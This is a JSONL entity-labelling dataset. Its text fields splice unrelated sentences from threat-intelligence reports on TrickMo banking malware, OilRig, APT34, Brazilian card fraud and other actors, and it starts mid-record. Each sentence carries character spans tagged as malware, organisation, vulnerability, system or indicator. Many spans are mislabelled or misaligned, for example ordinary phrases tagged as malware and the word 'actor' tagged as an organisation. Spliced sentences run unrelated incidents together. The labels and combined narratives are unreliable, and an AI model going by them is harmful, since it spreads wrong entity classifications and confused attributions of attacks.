Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 451, "end": 465, "label": "Vulnerability"}, {"start": 493, "end": 512, "label": "Organization"}, {"start": 557, "end": 591, "label": "Organization"}]} {"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs .", "spans": [{"start": 117, "end": 127, "label": "Malware"}, {"start": 312, "end": 326, "label": "Vulnerability"}, {"start": 433, "end": 451, "label": "Organization"}, {"start": 488, "end": 513, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}]} {"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a \u201c kill switch \u201d that can eliminate the malware remotely from an infected device . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . 
On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": [{"start": 179, "end": 184, "label": "Organization"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Vulnerability"}, {"start": 383, "end": 399, "label": "Vulnerability"}, {"start": 400, "end": 407, "label": "Vulnerability"}, {"start": 432, "end": 439, "label": "Organization"}, {"start": 453, "end": 459, "label": "Organization"}, {"start": 499, "end": 515, "label": "Organization"}]} {"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": [{"start": 136, "end": 149, "label": "Malware"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 294, "end": 307, "label": "Vulnerability"}, {"start": 312, "end": 325, "label": "Vulnerability"}, {"start": 339, "end": 347, "label": "Organization"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 408, "end": 435, "label": "Malware"}, {"start": 487, "end": 507, "label": "Malware"}]} {"text": "Usually , when users are already infected with malware like TrickBot on their desktop , they will see a web injection asking for their mobile device operating system ( OS ) type and phone number . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . 
Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": [{"start": 60, "end": 68, "label": "Malware"}, {"start": 210, "end": 221, "label": "Organization"}, {"start": 337, "end": 351, "label": "Vulnerability"}, {"start": 363, "end": 376, "label": "Vulnerability"}, {"start": 469, "end": 490, "label": "Organization"}]} {"text": "Next , if they indicate that they use an Android-based device , the Trojan , impersonating their bank with web injections , fools the victim into installing a fake security app . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": [{"start": 41, "end": 54, "label": "System"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 261, "end": 274, "label": "Vulnerability"}, {"start": 355, "end": 385, "label": "Indicator"}, {"start": 423, "end": 429, "label": "Organization"}]} {"text": "The supposed purpose of that app is to obtain and use a required \u201c security code \u201d to log in to their online banking site . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . However , the attack on January 16 did not involve ThreeDollars at all .", "spans": [{"start": 124, "end": 132, "label": "Malware"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 280, "end": 292, "label": "Malware"}]} {"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it \u201c TrickMo. \u201d Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category . 
Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 122, "end": 130, "label": "Malware"}, {"start": 175, "end": 182, "label": "Malware"}, {"start": 350, "end": 357, "label": "Vulnerability"}, {"start": 366, "end": 394, "label": "Vulnerability"}, {"start": 497, "end": 509, "label": "Organization"}]} {"text": "Its main capabilities include : Stealing personal device information Intercepting SMS messages Recording targeted applications for one-time password ( TAN ) Lockdown of the phone Stealing pictures from the device Self-destruction and removal As banks release more advanced security measures , banking malware evolves to keep up with the perpetual arms race . The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": [{"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 380, "end": 389, "label": "Organization"}, {"start": 411, "end": 429, "label": "Malware"}, {"start": 471, "end": 477, "label": "Organization"}, {"start": 512, "end": 525, "label": "Malware"}]} {"text": "From our analysis of the TrickMo mobile malware , it is apparent that TrickMo is designed to break the newest methods of OTP and , specifically , TAN codes often used in Germany . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . 
In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 70, "end": 77, "label": "Malware"}, {"start": 191, "end": 205, "label": "Organization"}, {"start": 235, "end": 248, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}]} {"text": "Among the various features we discuss in this post , we believe that TrickMo \u2019 s most significant novelty is an app recording feature , which gives it the ability to overcome the newer pushTAN app validations used by German banks . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East .", "spans": [{"start": 69, "end": 76, "label": "Malware"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 471, "end": 477, "label": "Organization"}, {"start": 564, "end": 580, "label": "Organization"}]} {"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a \u201c kill switch \u201d that can remotely eliminate the malware from a mobile device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . 
The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": [{"start": 393, "end": 407, "label": "Organization"}, {"start": 458, "end": 480, "label": "Indicator"}, {"start": 504, "end": 518, "label": "System"}, {"start": 540, "end": 552, "label": "Malware"}]} {"text": "Why Do Desktop Trojans Use a Mobile Component ? PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": [{"start": 48, "end": 60, "label": "Organization"}, {"start": 88, "end": 93, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 348, "end": 354, "label": "Organization"}, {"start": 426, "end": 432, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}]} {"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim \u2019 s online banking account and perform money transfers . PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": [{"start": 168, "end": 180, "label": "Organization"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 438, "end": 453, "label": "Indicator"}]} {"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods . 
Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": [{"start": 117, "end": 123, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 144, "end": 150, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 299, "end": 311, "label": "Malware"}]} {"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) . Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 157, "end": 176, "label": "System"}, {"start": 335, "end": 347, "label": "Organization"}]} {"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client \u2019 s mobile device . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 133, "end": 164, "label": "System"}, {"start": 375, "end": 381, "label": "Organization"}, {"start": 382, "end": 384, "label": "System"}]} {"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser . In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": [{"start": 134, "end": 141, "label": "Organization"}, {"start": 242, "end": 256, "label": "Organization"}, {"start": 355, "end": 367, "label": "Organization"}, {"start": 378, "end": 399, "label": "Malware"}, {"start": 404, "end": 424, "label": "Malware"}, {"start": 436, "end": 453, "label": "Organization"}]} {"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted . The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . 
Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": [{"start": 118, "end": 130, "label": "Organization"}, {"start": 266, "end": 267, "label": "System"}, {"start": 319, "end": 321, "label": "Indicator"}, {"start": 357, "end": 363, "label": "Organization"}]} {"text": "Meanwhile , desktop banking Trojans developed the ability to execute various social engineering schemes by using web injections , a method that alters the content presented to the infected victim in their browser . The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": [{"start": 219, "end": 231, "label": "Organization"}, {"start": 257, "end": 266, "label": "System"}, {"start": 428, "end": 449, "label": "Indicator"}]} {"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component . In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The OilRig group continues to remain a highly active adversary in the Middle East region .", "spans": [{"start": 297, "end": 309, "label": "Organization"}, {"start": 341, "end": 346, "label": "System"}, {"start": 353, "end": 365, "label": "Organization"}]} {"text": "But attackers were still constantly looking for new methods to steal TANs . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . 
Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": [{"start": 149, "end": 161, "label": "Organization"}, {"start": 201, "end": 221, "label": "Organization"}, {"start": 317, "end": 325, "label": "Organization"}]} {"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called \u201c ZitMo \u201d ( Zeus in the Mobile ) . The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": [{"start": 27, "end": 38, "label": "Malware"}, {"start": 129, "end": 134, "label": "Malware"}, {"start": 139, "end": 143, "label": "Malware"}, {"start": 166, "end": 175, "label": "Organization"}, {"start": 383, "end": 392, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 408, "end": 414, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}, {"start": 428, "end": 446, "label": "Organization"}]} {"text": "This was used to bypass 2FA methods by intercepting the SMS messages coming from the bank and stealing the mTANs without the victim \u2019 s knowledge . We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . 
Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": [{"start": 176, "end": 181, "label": "Organization"}, {"start": 296, "end": 305, "label": "Organization"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 319, "end": 343, "label": "Organization"}, {"start": 350, "end": 357, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}]} {"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": [{"start": 140, "end": 145, "label": "Organization"}, {"start": 197, "end": 218, "label": "Malware"}, {"start": 377, "end": 384, "label": "Organization"}, {"start": 400, "end": 405, "label": "Organization"}]} {"text": "From mTAN to pushTAN In the past few years , some banks in Europe , especially in Germany , stopped using SMS-based authentication and switched to dedicated pushTAN applications for 2FA schemes . Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . 
APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": [{"start": 196, "end": 204, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}]} {"text": "Instead of relying on SMS messages , which can be easily intercepted by third-party apps , these applications started using push notifications for users , containing the transaction details and the TAN . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 284, "end": 292, "label": "Malware"}, {"start": 362, "end": 367, "label": "Organization"}, {"start": 382, "end": 398, "label": "System"}, {"start": 413, "end": 427, "label": "Vulnerability"}, {"start": 438, "end": 446, "label": "Malware"}, {"start": 451, "end": 462, "label": "Malware"}, {"start": 486, "end": 495, "label": "Organization"}]} {"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers . Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . 
Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": [{"start": 147, "end": 155, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}]} {"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it \u2019 s particularly challenging for mobile malware due to Android \u2019 s application sandbox . Russian cyber espionage actors use zero-day exploits in addition to less complex measures . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 169, "end": 176, "label": "System"}]} {"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device . If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The email address is associated with the Lebanese domain of a major global financial institution .", "spans": [{"start": 132, "end": 141, "label": "Organization"}, {"start": 318, "end": 323, "label": "System"}, {"start": 389, "end": 410, "label": "Organization"}]} {"text": "To get around this challenge , TrickMo \u2019 s developers added some new features to steal TANs using screen video recording and screen data scraping . The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . 
POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 152, "end": 167, "label": "System"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 345, "end": 358, "label": "Malware"}, {"start": 379, "end": 392, "label": "Vulnerability"}]} {"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? HawkEye is a versatile Trojan used by diverse actors for multiple purposes . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 45, "end": 52, "label": "Malware"}, {"start": 90, "end": 97, "label": "System"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 198, "end": 210, "label": "Organization"}, {"start": 246, "end": 254, "label": "Malware"}]} {"text": "It abuses accessibility services . In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": [{"start": 140, "end": 151, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 359, "end": 376, "label": "Malware"}]} {"text": "Android \u2019 s accessibility services were originally developed by Google for the benefit of users with disabilities . The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . 
On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 127, "end": 133, "label": "Organization"}, {"start": 148, "end": 160, "label": "Organization"}, {"start": 446, "end": 452, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]} {"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more . Once in their possession , the actors use these compromised payment card credentials to generate further card information . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": [{"start": 242, "end": 248, "label": "Organization"}, {"start": 403, "end": 415, "label": "Organization"}]} {"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios . The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . 
The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 139, "end": 144, "label": "Organization"}, {"start": 180, "end": 188, "label": "System"}, {"start": 269, "end": 281, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}]} {"text": "Once on the device , as installed by a duped user , the TrickMo component opens and sends an intent to start the accessibility settings activity , coercing the user to grant it with accessibility permissions . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 232, "end": 236, "label": "Malware"}, {"start": 237, "end": 275, "label": "Malware"}, {"start": 405, "end": 423, "label": "Malware"}, {"start": 469, "end": 486, "label": "Malware"}, {"start": 579, "end": 597, "label": "Organization"}]} {"text": "Then , it uses the accessibility service for its malicious operations , some of which include : Preventing the user from uninstalling the app Becoming the default SMS app by changing device settings Monitoring the currently running application ( s ) Scraping on-screen text Android operating systems include many dialog screens that require the denial , or approval , of app permissions and actions that have to receive input from the user by tapping a button on the screen . Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . 
Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": [{"start": 274, "end": 281, "label": "System"}, {"start": 509, "end": 514, "label": "Organization"}, {"start": 829, "end": 838, "label": "Malware"}]} {"text": "TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react . Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 226, "end": 243, "label": "System"}, {"start": 246, "end": 266, "label": "System"}, {"start": 386, "end": 409, "label": "Organization"}]} {"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices . These actors scan websites for vulnerabilities to exploit to illicitly access databases . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": [{"start": 178, "end": 184, "label": "Organization"}, {"start": 302, "end": 321, "label": "Malware"}]} {"text": "TrickMo \u2019 s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot . 
The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 54, "end": 67, "label": "System"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 181, "end": 194, "label": "System"}, {"start": 428, "end": 447, "label": "Malware"}, {"start": 474, "end": 480, "label": "Malware"}, {"start": 490, "end": 498, "label": "Malware"}, {"start": 561, "end": 575, "label": "Malware"}, {"start": 636, "end": 644, "label": "Malware"}]} {"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the \u201c android.intent.action.BOOT_COMPLETED \u201d broadcast action and adding code that boots the application when the broadcast is fired . Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . 
The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": [{"start": 100, "end": 136, "label": "Indicator"}, {"start": 271, "end": 287, "label": "System"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 485, "end": 494, "label": "Malware"}, {"start": 514, "end": 543, "label": "Indicator"}, {"start": 557, "end": 584, "label": "Malware"}]} {"text": "This instruction is especially important for malware that tries to avoid user interaction by running in the background as a service . The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": [{"start": 138, "end": 144, "label": "Organization"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 428, "end": 446, "label": "Malware"}, {"start": 457, "end": 474, "label": "Malware"}]} {"text": "But TrickMo does things differently . The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . 
While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 42, "end": 47, "label": "Organization"}, {"start": 67, "end": 83, "label": "System"}, {"start": 100, "end": 108, "label": "System"}, {"start": 219, "end": 229, "label": "Organization"}, {"start": 245, "end": 256, "label": "Malware"}, {"start": 259, "end": 266, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}]} {"text": "Instead of running its service only at boot time , it registers a receiver that listens to the \u201c android.intent.action.SCREEN_ON \u201d and \u201c android.provider.Telephony.SMS_DELIVER \u201d broadcast actions . However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": [{"start": 97, "end": 128, "label": "Indicator"}, {"start": 137, "end": 175, "label": "Indicator"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 477, "end": 502, "label": "Organization"}, {"start": 519, "end": 530, "label": "Malware"}, {"start": 541, "end": 548, "label": "Organization"}, {"start": 585, "end": 594, "label": "Organization"}, {"start": 620, "end": 626, "label": "Organization"}]} {"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval . 
The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 118, "end": 129, "label": "Organization"}, {"start": 136, "end": 144, "label": "System"}, {"start": 176, "end": 184, "label": "System"}]} {"text": "In other words , TrickMo \u2019 s service will start either after the device becomes interactive or after a new SMS message is received . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 270, "end": 280, "label": "Malware"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 397, "end": 399, "label": "System"}, {"start": 471, "end": 491, "label": "Indicator"}, {"start": 496, "end": 523, "label": "Indicator"}]} {"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . 
These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 178, "end": 182, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 454, "end": 464, "label": "Organization"}, {"start": 467, "end": 477, "label": "Indicator"}, {"start": 480, "end": 544, "label": "Indicator"}]} {"text": "Some of the settings are Boolean values that act as switches . Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": [{"start": 121, "end": 127, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}]} {"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . 
HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals .", "spans": [{"start": 185, "end": 194, "label": "Malware"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 498, "end": 504, "label": "Organization"}, {"start": 507, "end": 516, "label": "Organization"}, {"start": 519, "end": 529, "label": "Organization"}, {"start": 532, "end": 543, "label": "Organization"}, {"start": 548, "end": 575, "label": "Organization"}]} {"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 303, "end": 310, "label": "Malware"}, {"start": 395, "end": 405, "label": "System"}, {"start": 476, "end": 484, "label": "System"}, {"start": 493, "end": 506, "label": "Malware"}, {"start": 584, "end": 603, "label": "Organization"}, {"start": 739, "end": 748, "label": "Organization"}]} {"text": "A TrickMo version from January 2020 contained code that checks if the app is running on a rooted device or an emulator to prevent analysis . 
